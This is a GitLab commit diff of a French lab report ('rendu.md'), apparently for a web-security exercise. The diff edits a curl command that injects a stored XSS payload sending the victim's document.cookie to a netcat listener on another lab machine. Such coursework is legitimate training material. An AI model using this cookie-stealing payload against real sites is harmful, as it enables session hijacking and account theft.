Skip to content
Snippets Groups Projects
Commit 1188fe09 authored by Selim Lakhdar's avatar Selim Lakhdar
Browse files

Update rendu.md

parent 8004b61c
No related branches found
No related tags found
No related merge requests found
...@@ -74,7 +74,7 @@ cursor.execute(requete, [post["chaine"], cherrypy.request.remote.ip]) ...@@ -74,7 +74,7 @@ cursor.execute(requete, [post["chaine"], cherrypy.request.remote.ip])
``` ```
- nc -l -p 6666 (sur la machine 172.28.101.111) - nc -l -p 6666 (sur la machine 172.28.101.111)
- curl -X POST -d "chaine=<script>location.replace(\"http://172.28.101.111:6666?c=\"+document.cookie)</script>" http://172.28.101.47:8080 - curl -X POST --data-urlencode "chaine=<script>location.replace(\"http://172.28.101.111:6666?c=\"+document.cookie)</script>" http://172.28.101.47:8080
``` ```
## Question 6 ## Question 6
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Please register or to comment